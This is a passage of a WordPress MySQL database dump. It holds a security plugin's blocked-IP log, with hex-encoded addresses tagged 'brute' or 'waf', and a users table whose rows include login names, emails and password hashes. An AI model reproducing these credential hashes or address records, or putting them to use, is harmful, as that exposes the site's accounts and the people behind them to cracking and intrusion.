658,'brute'),(0x00000000000000000000FFFFCA86136E,'VN',1,19658,'brute'),(0x00000000000000000000FFFF1761CDD2,'NL',1,19658,'brute'),(0x00000000000000000000FFFF23BB3A88,'BE',1,19658,'brute'),(0x00000000000000000000FFFF43CD0C92,'US',1,19658,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19658,'waf'),(0x00000000000000000000FFFF14CC293E,'IN',1,19658,'brute'),(0x00000000000000000000FFFF9FDFDEA1,'NL',1,19658,'brute'),(0x00000000000000000000FFFFD849A0DC,'US',1,19681,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19681,'waf'),(0x00000000000000000000FFFF14F40042,'IN',1,19681,'waf'),(0x00000000000000000000FFFF68FAEEEF,'US',1,19681,'waf'),(0x00000000000000000000FFFFB9D84606,'US',3,19681,'waf'),(0x00000000000000000000FFFF975043E5,'FR',1,19655,'waf'),(0x00000000000000000000FFFF14AB3218,'US',1,19655,'waf'),(0x00000000000000000000FFFFA76357BF,'GB',1,19655,'brute'),(0x00000000000000000000FFFF45A3E068,'US',1,19654,'brute'),(0x00000000000000000000FFFF04F04955,'IN',1,19654,'waf'),(0x00000000000000000000FFFF7DD4D1AB,'VN',1,19654,'brute'),(0x00000000000000000000FFFF4246AA98,'CA',1,19654,'brute'),(0x00000000000000000000FFFF2FF2B504,'HK',1,19655,'brute'),(0x00000000000000000000FFFF8B63500F,'SG',1,19655,'brute'),(0x00000000000000000000FFFF14A313D2,'US',54,19655,'brute'),(0x00000000000000000000FFFFC2A9AF5C,'NL',4,19653,'waf'),(0x00000000000000000000FFFF14A34DA3,'US',1,19653,'brute'),(0x00000000000000000000FFFF681CC85F,'IN',2,19653,'brute'),(0x00000000000000000000FFFF68E18FE4,'CA',27,19653,'brute'),(0x00000000000000000000FFFFC2A9AF5D,'NL',4,19653,'waf'),(0x00000000000000000000FFFFCDB97B3A,'US',2,19653,'brute'),(0x00000000000000000000FFFF40E34E71,'NL',1,19653,'waf'),(0x00000000000000000000FFFF68F44F72,'LU',2,19653,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',2,19653,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',1,19653,'waf'),(0x00000000000000000000FFFFC6C76929,'US',1,19681,'waf'),(0x00000000000000000000FFFF5B5CF799,'BG',1,19681,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19681,'waf'),(0x00000000000000000000FFFF40E34E71,'NL',2,19681,'waf'),(0x00000000000000000000FFFFC3141064,'RU',1,19681,'waf'),(0x00000000000000000000FFFFBC865061,'RU',1,19680,'waf'),(0x00000000000000000000FFFF8A44A694,'GB',2,19680,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19680,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',8,19680,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19680,'waf'),(0x00000000000000000000FFFFC6C7713D,'US',1,19680,'waf'),(0x00000000000000000000FFFFC0F1E01C,'US',1,19679,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19679,'waf'),(0x00000000000000000000FFFF5B5CFE59,'BG',7,19679,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',2,19679,'waf'),(0x00000000000000000000FFFF40E34E71,'NL',6,19679,'waf'),(0x00000000000000000000FFFF5B5CFCA8,'BG',7,19679,'waf'),(0x00000000000000000000FFFF48A72CA2,'US',1,19679,'waf'),(0x00000000000000000000FFFF14DB0858,'IN',3,19679,'waf'),(0x00000000000000000000FFFFC614F594,'US',1,19679,'waf'),(0x00000000000000000000FFFF8B3B4DD8,'IN',1,19679,'waf'),(0x00000000000000000000FFFFD9A03CA2,'DE',1,19679,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',19,19676,'waf'),(0x00000000000000000000FFFF5F6FEAB8,'DE',1,19676,'waf'),(0x00000000000000000000FFFF55728ADC,'DE',38,19676,'waf'),(0x00000000000000000000FFFF40E34E71,'NL',1,19675,'waf'),(0x00000000000000000000FFFFA2F3890E,'US',1,19654,'waf'),(0x00000000000000000000FFFF2BF1464B,'IN',1,19654,'brute'),(0x00000000000000000000FFFF45A3E06B,'US',1,19654,'brute'),(0x00000000000000000000FFFF32742394,'US',20,19654,'waf'),(0x00000000000000000000FFFF5E173DA5,'FR',1,19654,'brute'),(0x00000000000000000000FFFFC2A9AF5D,'NL',8,19654,'waf'),(0x00000000000000000000FFFF14546A3D,'US',1,19654,'brute'),(0x00000000000000000000FFFF29D8BCD7,'DE',1,19654,'waf'),(0x00000000000000000000FFFF68F44892,'LU',1,19654,'brute'),(0x00000000000000000000FFFF14262E94,'US',38,19654,'brute'),(0x00000000000000000000FFFF2D3DB93C,'US',2,19654,'brute'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19653,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19654,'waf'),(0x00000000000000000000FFFF3ED2B904,'FR',1,19654,'waf'),(0x00000000000000000000FFFF14A313D2,'US',1,19654,'brute'),(0x00000000000000000000FFFF6BBD0434,'LU',1,19654,'brute'),(0x00000000000000000000FFFFCDB9734C,'US',1,19653,'brute'),(0x00000000000000000000FFFFC662338C,'US',1,19653,'brute'),(0x00000000000000000000FFFFC7C3FAE5,'US',1,19654,'brute'),(0x00000000000000000000FFFF68F44A08,'LU',1,19654,'brute'),(0x00000000000000000000FFFF48FBE93C,'US',1,19652,'waf'),(0x00000000000000000000FFFFC6623950,'US',1,19652,'brute'),(0x00000000000000000000FFFF14A31269,'US',15,19652,'waf'),(0x00000000000000000000FFFF39804123,'FR',1,19653,'brute'),(0x00000000000000000000FFFFC12A213D,'NL',1,19653,'waf'),(0x00000000000000000000FFFF14A34A52,'US',78,19653,'waf'),(0x00000000000000000000FFFF14262AA2,'US',55,19654,'brute'),(0x00000000000000000000FFFF92BED9B9,'US',1,19659,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',2,19659,'waf'),(0x00000000000000000000FFFF29D8BCA2,'DE',1,19659,'waf'),(0x00000000000000000000FFFFD2CF5C18,'KR',1,19659,'brute'),(0x00000000000000000000FFFF7DD4D1AB,'VN',1,19659,'brute'),(0x00000000000000000000FFFF34B20516,'NL',15,19658,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',44,19658,'waf'),(0x00000000000000000000FFFF08DB33B7,'SG',2,19658,'brute'),(0x00000000000000000000FFFF55728ADC,'DE',38,19658,'waf'),(0x00000000000000000000FFFF43CD0BC6,'US',2,19658,'brute'),(0x00000000000000000000FFFF45A3E06B,'US',1,19658,'brute'),(0x00000000000000000000FFFF8B3B1AD1,'IN',1,19658,'brute'),(0x00000000000000000000FFFF2E142EC6,'DE',2,19675,'waf'),(0x00000000000000000000FFFF6246325A,'IN',1,19675,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19675,'waf'),(0x00000000000000000000FFFFB9D84606,'US',343,19675,'waf'),(0x00000000000000000000FFFF9CF91C20,'SC',2,19675,'waf'),(0x00000000000000000000FFFF57FB40AF,'RU',1,19675,'waf'),(0x00000000000000000000FFFFC2A9AF1F,'NL',6,19674,'waf'),(0x00000000000000000000FFFF14A36F08,'US',1,19658,'waf'),(0x00000000000000000000FFFF48FBE93C,'US',1,19658,'waf'),(0x00000000000000000000FFFF743ECEAE,'CN',1,19658,'brute'),(0x00000000000000000000FFFF9387FF08,'FR',1,19658,'brute'),(0x00000000000000000000FFFF5BEEA4AC,'GB',1,19658,'brute'),(0x00000000000000000000FFFF3624ADCD,'FR',2,19658,'brute'),(0x00000000000000000000FFFF2E691D15,'FR',2,19651,'brute'),(0x00000000000000000000FFFF140E5E86,'US',15,19651,'brute'),(0x00000000000000000000FFFFC7C3FAE5,'US',1,19651,'brute'),(0x00000000000000000000FFFF1763E5DA,'US',1,19651,'brute'),(0x00000000000000000000FFFFB280BBB7,'US',1,19651,'brute'),(0x00000000000000000000FFFF5FD61B05,'US',1,19651,'waf'),(0x00000000000000000000FFFFADECA80A,'US',1,19651,'brute'),(0x00000000000000000000FFFFC6623950,'US',1,19651,'brute'),(0x00000000000000000000FFFFACC8EABB,'GB',1,19651,'brute'),(0x00000000000000000000FFFF5EF5697F,'IE',1,19651,'brute'),(0x00000000000000000000FFFF68F852F9,'NL',2,19651,'waf'),(0x00000000000000000000FFFFCDB9734C,'US',1,19651,'brute'),(0x00000000000000000000FFFF82FFA650,'SE',1,19651,'waf'),(0x00000000000000000000FFFF14A8063C,'US',37,19651,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19651,'waf'),(0x00000000000000000000FFFFC7C3FA6E,'US',1,19651,'brute'),(0x00000000000000000000FFFF14A80890,'US',14,19651,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19651,'waf'),(0x00000000000000000000FFFF68F44F72,'LU',1,19651,'brute'),(0x00000000000000000000FFFF2D3DBBD3,'US',1,19651,'brute'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19652,'waf'),(0x00000000000000000000FFFF6BAAD016,'US',1,19660,'waf'),(0x00000000000000000000FFFFCDB97ED6,'US',1,19660,'brute'),(0x00000000000000000000FFFF877D0109,'FR',1,19658,'brute'),(0x00000000000000000000FFFF04F04B54,'IN',1,19658,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',9,19658,'waf'),(0x00000000000000000000FFFF40E34E71,'NL',1,19658,'waf'),(0x00000000000000000000FFFFA5E3EC6F,'GB',1,19658,'brute'),(0x00000000000000000000FFFFD18D2E63,'US',1,19658,'brute'),(0x00000000000000000000FFFF4D445789,'GB',1,19658,'brute'),(0x00000000000000000000FFFF6246325A,'IN',1,19658,'waf'),(0x00000000000000000000FFFF8A44A694,'GB',2,19658,'waf'),(0x00000000000000000000FFFF6A345B26,'CN',1,19658,'brute'),(0x00000000000000000000FFFF14A80912,'US',84,19658,'brute'),(0x00000000000000000000FFFF140E5E86,'US',1,19658,'brute'),(0x00000000000000000000FFFF2765B9BA,'CN',2,19658,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19658,'waf'),(0x00000000000000000000FFFF45A3E06B,'US',1,19657,'brute'),(0x00000000000000000000FFFF29D8BC5C,'DE',1,19657,'waf'),(0x00000000000000000000FFFF14A805F7,'US',15,19657,'waf'),(0x00000000000000000000FFFF9448D6F5,'SG',1,19657,'brute'),(0x00000000000000000000FFFF6BBD073A,'LU',1,19657,'brute'),(0x00000000000000000000FFFF23CDE0F8,'BE',1,19657,'brute'),(0x00000000000000000000FFFFDD786787,'BD',1,19657,'brute'),(0x00000000000000000000FFFFCB704C12,'BD',1,19657,'brute'),(0x00000000000000000000FFFFA7AC42BD,'SG',1,19657,'brute'),(0x00000000000000000000FFFFC2A9AF1A,'NL',12,19657,'waf'),(0x00000000000000000000FFFF6BBD0B51,'LU',2,19658,'brute'),(0x00000000000000000000FFFF14A80890,'US',7,19658,'brute'),(0x00000000000000000000FFFF5762AB8A,'FR',1,19658,'brute'),(0x00000000000000000000FFFF68F44C93,'LU',1,19657,'brute'),(0x00000000000000000000FFFFC66231A3,'US',1,19657,'brute'),(0x00000000000000000000FFFF4D445789,'GB',1,19657,'brute'),(0x00000000000000000000FFFF14A80912,'US',1,19657,'brute'),(0x00000000000000000000FFFFA2D64844,'US',2,19657,'brute'),(0x00000000000000000000FFFFC2A9AF16,'NL',20,19657,'waf'),(0x00000000000000000000FFFF9387FF08,'FR',1,19657,'brute'),(0x00000000000000000000FFFF25BB872D,'FR',1,19657,'brute'),(0x00000000000000000000FFFF2D775234,'VN',2,19657,'brute'),(0x00000000000000000000FFFF1763E5DA,'US',1,19657,'brute'),(0x00000000000000000000FFFF675AA34B,'US',41,19657,'brute'),(0x00000000000000000000FFFF14A61D1C,'IE',16,19657,'brute'),(0x00000000000000000000FFFF14A80915,'US',77,19657,'brute'),(0x00000000000000000000FFFF14A80915,'US',3,19656,'brute'),(0x00000000000000000000FFFF969E9799,'CN',2,19656,'brute'),(0x00000000000000000000FFFFC2A9AF18,'NL',1,19656,'waf'),(0x00000000000000000000FFFFD18D3863,'US',1,19656,'brute'),(0x00000000000000000000FFFFA2F38A34,'US',1,19656,'waf'),(0x00000000000000000000FFFFC2A9AF16,'NL',1,19651,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',4,19651,'waf'),(0x00000000000000000000FFFF6BBD073A,'LU',1,19651,'brute'),(0x00000000000000000000FFFFC2A9AF5C,'NL',9,19651,'waf'),(0x00000000000000000000FFFFCDB97C72,'US',1,19651,'brute'),(0x00000000000000000000FFFF68F44892,'LU',1,19651,'brute'),(0x00000000000000000000FFFF140E50F2,'US',34,19651,'brute'),(0x00000000000000000000FFFFC7C3FAE5,'US',1,19656,'brute'),(0x00000000000000000000FFFF423741D2,'US',22,19656,'brute'),(0x00000000000000000000FFFF67B4A3CD,'IN',1,19655,'waf'),(0x00000000000000000000FFFF17662B52,'IE',1,19655,'waf'),(0x00000000000000000000FFFF334B793F,'FR',2,19655,'waf'),(0x00000000000000000000FFFF592E4204,'IT',1,19655,'waf'),(0x00000000000000000000FFFF423741D2,'US',8,19655,'brute'),(0x00000000000000000000FFFF14A3343E,'US',15,19655,'waf'),(0x00000000000000000000FFFF14F40440,'IN',1,19655,'waf'),(0x00000000000000000000FFFFC7C3FAE5,'US',1,19655,'brute'),(0x00000000000000000000FFFFCF2EEACA,'SG',1,19654,'brute'),(0x00000000000000000000FFFF14E58B0C,'NL',15,19653,'waf'),(0x00000000000000000000FFFF4F6E3EB9,'US',1,19653,'waf'),(0x00000000000000000000FFFF147E4CDA,'NL',2,19653,'waf'),(0x00000000000000000000FFFF5FD61B05,'US',1,19653,'waf'),(0x00000000000000000000FFFF14262AA2,'US',28,19653,'brute'),(0x00000000000000000000FFFF2D5127C2,'NL',6,19660,'waf'),(0x00000000000000000000FFFF14262AA2,'US',15,19660,'waf'),(0x00000000000000000000FFFFCDB97E2A,'US',1,19659,'brute'),(0x00000000000000000000FFFF33266A4A,'FR',157,19659,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19659,'waf'),(0x00000000000000000000FFFF59276D1E,'RO',1,19658,'brute'),(0x00000000000000000000FFFF8794EDD0,'US',3,19658,'waf'),(0x00000000000000000000FFFFC0F1C372,'US',1,19658,'waf'),(0x00000000000000000000FFFF34902DCB,'US',1,19659,'brute'),(0x00000000000000000000FFFF682D5DF2,'IE',1,19659,'waf'),(0x00000000000000000000FFFF2D3DBC69,'US',1,19659,'brute'),(0x00000000000000000000FFFFB9D847FC,'NL',1,19659,'waf'),(0x00000000000000000000FFFF14262E3D,'US',45,19661,'brute'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19660,'waf'),(0x00000000000000000000FFFF14A30F0B,'US',1,19659,'brute'),(0x00000000000000000000FFFFC66231AA,'US',1,19660,'brute'),(0x00000000000000000000FFFF68FAEEAD,'US',1,19660,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',8,19660,'waf'),(0x00000000000000000000FFFF258B81F4,'NL',6,19660,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',4,19660,'waf'),(0x00000000000000000000FFFFC2A9AF1C,'NL',2,19660,'waf'),(0x00000000000000000000FFFF68E18FE4,'CA',7,19660,'brute'),(0x00000000000000000000FFFF68FAEE68,'US',9,19663,'waf'),(0x00000000000000000000FFFFC6623D35,'US',1,19663,'brute'),(0x00000000000000000000FFFFC2A9AF17,'NL',1,19663,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',8,19663,'waf'),(0x00000000000000000000FFFF6BBD1E80,'LU',1,19663,'brute'),(0x00000000000000000000FFFF5F6FEAB8,'DE',9,19663,'waf'),(0x00000000000000000000FFFF7DD4D1AB,'VN',1,19663,'brute'),(0x00000000000000000000FFFF67590D4A,'US',1,19663,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19682,'waf'),(0x00000000000000000000FFFF14DB32E5,'IN',15,19682,'waf'),(0x00000000000000000000FFFFA484AC8F,'FR',1,19682,'waf'),(0x00000000000000000000FFFF592E4204,'IT',1,19682,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',4,19682,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',2,19681,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',1,19681,'waf'),(0x00000000000000000000FFFF67BFF176,'BD',20,19681,'waf'),(0x00000000000000000000FFFF2D4FC0AF,'US',1,19681,'waf'),(0x00000000000000000000FFFFC0F1D505,'US',1,19666,'waf'),(0x00000000000000000000FFFFACE8217A,'FR',71,19666,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19666,'waf'),(0x00000000000000000000FFFFACE80D33,'US',20,19666,'waf'),(0x00000000000000000000FFFF893B7D4A,'ID',1,19663,'brute'),(0x00000000000000000000FFFFB29F2530,'UA',9,19663,'waf'),(0x00000000000000000000FFFF97EC1677,'US',1,19663,'brute'),(0x00000000000000000000FFFF68F852F9,'NL',2,19663,'waf'),(0x00000000000000000000FFFF67B04E29,'ID',1,19663,'brute'),(0x00000000000000000000FFFF335B973C,'FR',1,19663,'brute'),(0x00000000000000000000FFFF0D5FE80B,'NL',8,19663,'brute'),(0x00000000000000000000FFFF2D3DBC28,'US',1,19662,'brute'),(0x00000000000000000000FFFF5BEEA4AC,'GB',1,19662,'brute'),(0x00000000000000000000FFFFA2F39232,'US',1,19662,'waf'),(0x00000000000000000000FFFF8AC73886,'CZ',1,19662,'waf'),(0x00000000000000000000FFFF14262E3D,'US',21,19662,'brute'),(0x00000000000000000000FFFFC2A9AF0F,'NL',92,19662,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',4,19662,'waf'),(0x00000000000000000000FFFF8A44D026,'US',1,19662,'waf'),(0x00000000000000000000FFFFD9A03F2C,'DE',72,19666,'waf'),(0x00000000000000000000FFFF5B5CFE59,'BG',7,19666,'waf'),(0x00000000000000000000FFFFC0F1E915,'US',1,19665,'waf'),(0x00000000000000000000FFFFC2A9AF19,'NL',30,19665,'waf'),(0x00000000000000000000FFFF1476AF54,'US',1,19665,'waf'),(0x00000000000000000000FFFF5F6FEAB8,'DE',1,19665,'waf'),(0x00000000000000000000FFFFACE98EBD,'US',3,19665,'waf'),(0x00000000000000000000FFFF529D100B,'CN',1,19663,'brute'),(0x00000000000000000000FFFF34BCC31F,'US',2,19663,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19665,'waf'),(0x00000000000000000000FFFFB9D84606,'US',44,19664,'waf'),(0x00000000000000000000FFFF5B5CF799,'BG',1,19664,'waf'),(0x00000000000000000000FFFF5B5CF799,'BG',1,19665,'waf'),(0x00000000000000000000FFFF33DE2CBC,'CA',1,19665,'waf'),(0x00000000000000000000FFFF55D7A2F3,'DE',2,19676,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',2,19676,'waf'),(0x00000000000000000000FFFFC39A2963,'FR',1,19676,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19676,'waf'),(0x00000000000000000000FFFFC6C77431,'US',1,19676,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',2,19676,'waf'),(0x00000000000000000000FFFF5B5CF8B6,'BG',1,19675,'waf'),(0x00000000000000000000FFFF25DD5C44,'DE',15,19675,'waf'),(0x00000000000000000000FFFF5B5CFC8E,'BG',7,19675,'waf'),(0x00000000000000000000FFFFC6C7735A,'US',1,19674,'waf'),(0x00000000000000000000FFFF29D8BCA2,'DE',2,19674,'waf'),(0x00000000000000000000FFFFC2A9AF9E,'NL',6,19674,'waf'),(0x00000000000000000000FFFF5B5CF6C1,'BG',1,19674,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19674,'waf'),(0x00000000000000000000FFFF2D89CB43,'NL',571,19674,'waf'),(0x00000000000000000000FFFF55D7A2F3,'DE',1,19674,'waf'),(0x00000000000000000000FFFF04F0549B,'IN',1,19674,'waf'),(0x00000000000000000000FFFF5B5CF3D4,'BG',1,19674,'waf'),(0x00000000000000000000FFFF5B5CFE59,'BG',6,19673,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',2,19673,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19673,'waf'),(0x00000000000000000000FFFFC2A9AF1F,'NL',15,19673,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19673,'waf'),(0x00000000000000000000FFFF6DE6E29E,'DE',1,19673,'waf'),(0x00000000000000000000FFFF9DF524B2,'GB',3,19674,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19674,'waf'),(0x00000000000000000000FFFF2E142EC6,'DE',3,19674,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',2,19674,'waf'),(0x00000000000000000000FFFF923BF2EC,'FR',1,19674,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',2,19666,'waf'),(0x00000000000000000000FFFF5B5CF799,'BG',4,19666,'waf'),(0x00000000000000000000FFFFC2A9AF16,'NL',1,19666,'waf'),(0x00000000000000000000FFFF5B5CFCA8,'BG',7,19666,'waf'),(0x00000000000000000000FFFFACE9994F,'US',3,19666,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',2,19666,'waf'),(0x00000000000000000000FFFF40E34E71,'NL',1,19665,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19665,'waf'),(0x00000000000000000000FFFF68FAEED2,'US',9,19666,'waf'),(0x00000000000000000000FFFF3E8D26D7,'DE',6,19666,'waf'),(0x00000000000000000000FFFF624618CB,'IN',1,19673,'waf'),(0x00000000000000000000FFFFB9D84606,'US',8,19673,'waf'),(0x00000000000000000000FFFF5B5CF6C1,'BG',1,19673,'waf'),(0x00000000000000000000FFFF5B5CFCA8,'BG',6,19673,'waf'),(0x00000000000000000000FFFFA2F39609,'US',1,19672,'waf'),(0x00000000000000000000FFFFC2A9AF25,'NL',6,19672,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19671,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19669,'waf'),(0x00000000000000000000FFFFC2A9AF1F,'NL',156,19669,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',2,19668,'waf'),(0x00000000000000000000FFFF3E8D26D7,'DE',8,19668,'waf'),(0x00000000000000000000FFFFC0F1CF39,'US',1,19667,'waf'),(0x00000000000000000000FFFFC2A9AF16,'NL',1,19667,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',2,19667,'waf'),(0x00000000000000000000FFFFC2A9AF17,'NL',1,19667,'waf'),(0x00000000000000000000FFFF2E142EC6,'DE',14,19667,'waf'),(0x00000000000000000000FFFF3E8D26D7,'DE',2,19667,'waf'),(0x00000000000000000000FFFF0D5FE9A4,'NL',15,19667,'waf'),(0x00000000000000000000FFFF1437671A,'US',10,19667,'waf'),(0x00000000000000000000FFFFC2A9AF25,'NL',1,19671,'waf'),(0x00000000000000000000FFFFA2F3852C,'US',1,19671,'waf'),(0x00000000000000000000FFFF5B5CF799,'BG',2,19669,'waf'),(0x00000000000000000000FFFFAC69216B,'IN',1,19669,'waf'),(0x00000000000000000000FFFFC2A9AF9E,'NL',155,19669,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',2,19669,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',2,19669,'waf'),(0x00000000000000000000FFFFA213894E,'FR',1,19669,'waf'),(0x00000000000000000000FFFF1780F821,'US',1,19669,'waf'),(0x00000000000000000000FFFF2E142EC6,'DE',7,19668,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19668,'waf'),(0x00000000000000000000FFFF0389DE07,'US',3,19668,'waf'),(0x00000000000000000000FFFFB9D84606,'US',1,19667,'waf'),(0x00000000000000000000FFFF62463217,'IN',1,19668,'waf'),(0x00000000000000000000FFFFB9D84606,'US',2,19668,'waf'),(0x00000000000000000000FFFF25BB5BAA,'FR',1,19668,'waf'),(0x00000000000000000000FFFF68FAEE68,'US',9,19669,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19673,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19671,'waf'),(0x00000000000000000000FFFFACE982F8,'US',1,19671,'waf'),(0x00000000000000000000FFFF26792B68,'US',3,19671,'waf'),(0x00000000000000000000FFFF2D370024,'US',1,19668,'waf'),(0x00000000000000000000FFFF68FAEE68,'US',1,19668,'waf'),(0x00000000000000000000FFFFC2A9AF25,'NL',158,19668,'waf'),(0x00000000000000000000FFFFBB128A31,'BR',23,19668,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19670,'waf'),(0x00000000000000000000FFFF0D5F5C37,'NL',570,19670,'waf'),(0x00000000000000000000FFFF3E8D26D7,'DE',8,19670,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19669,'waf'),(0x00000000000000000000FFFF29D8BCA2,'DE',3,19669,'waf'),(0x00000000000000000000FFFFC0F1DB36,'US',1,19669,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',10,19670,'waf'),(0x00000000000000000000FFFF29D8BCA2,'DE',3,19673,'waf'),(0x00000000000000000000FFFF2E142EC6,'DE',8,19673,'waf'),(0x00000000000000000000FFFFC0F1C422,'US',1,19673,'waf'),(0x00000000000000000000FFFF68FAEE68,'US',4,19673,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',2,19673,'waf'),(0x00000000000000000000FFFF6DE6E29E,'DE',1,19672,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19672,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',4,19672,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',15,19671,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',2,19671,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19670,'waf'),(0x00000000000000000000FFFF2E142EC6,'DE',16,19672,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19672,'waf'),(0x00000000000000000000FFFF624618CB,'IN',1,19672,'waf'),(0x00000000000000000000FFFFB9D84606,'US',5,19672,'waf'),(0x00000000000000000000FFFF923BF2EC,'FR',1,19671,'waf'),(0x00000000000000000000FFFFC2A9AF4C,'NL',1,19671,'waf'),(0x00000000000000000000FFFF1439051A,'US',8,19671,'waf'),(0x00000000000000000000FFFFBB128A31,'BR',8,19671,'waf'),(0x00000000000000000000FFFF5B5CF799,'BG',1,19678,'waf'),(0x00000000000000000000FFFFACC8A100,'US',1,19678,'waf'),(0x00000000000000000000FFFF5B5CFCA2,'BG',21,19678,'waf'),(0x00000000000000000000FFFFA2F3802B,'US',1,19678,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19678,'waf'),(0x00000000000000000000FFFF5B5CFF14,'BG',24,19677,'waf'),(0x00000000000000000000FFFF9DE61D7C,'DE',1,19677,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',1,19675,'waf'),(0x00000000000000000000FFFFC2A9AF25,'NL',164,19675,'waf'),(0x00000000000000000000FFFF9CF91C20,'SC',2,19676,'waf'),(0x00000000000000000000FFFF68FAEE68,'US',9,19677,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',2,19677,'waf'),(0x00000000000000000000FFFF6BAAEC1F,'US',1,19677,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',23,19677,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19677,'waf'),(0x00000000000000000000FFFF74CAC6E1,'DE',1,19677,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',1,19677,'waf'),(0x00000000000000000000FFFF540F2DA3,'LT',1,19677,'waf'),(0x00000000000000000000FFFFC2A9AF23,'NL',157,19677,'waf');
/*!40000 ALTER TABLE `wpcl_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfblockediplog` with 613 row(s)
--

--
-- Table structure for table `wpcl_users`
--

DROP TABLE IF EXISTS `wpcl_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_users`
--

LOCK TABLES `wpcl_users` WRITE;
/*!40000 ALTER TABLE `wpcl_users` DISABLE KEYS */;
INSERT INTO `wpcl_users` VALUES (2,'S8zhaBda','$P$Bp9zvN9RgktXxo3JTHnm9IiFpcQw06/','s8zhabda','nada@zipnadanot.org','','2019-07-19 20:24:42','',0,'S8zhaBda'),(5,'emerg-user18','$P$BqSmbKQFqFMFTNJQkiZs7od5X7IuwA.','emerg-user18','emer4eck@no78place12atall.net','','2019-08-15 18:56:55','',0,'emerg-user18'),(15,'john-admin-96','$P$Bb2ITTNebfekPRHlUX8Tt8tFW7x6qx1','john-admin-96','nadazipought@zilch.org','','2022-01-07 19:57:04','1641585425:$P$BYFW.r4eQ8WstwWk17fHbBhTyRj3Bp0',0,'john-admin-96');
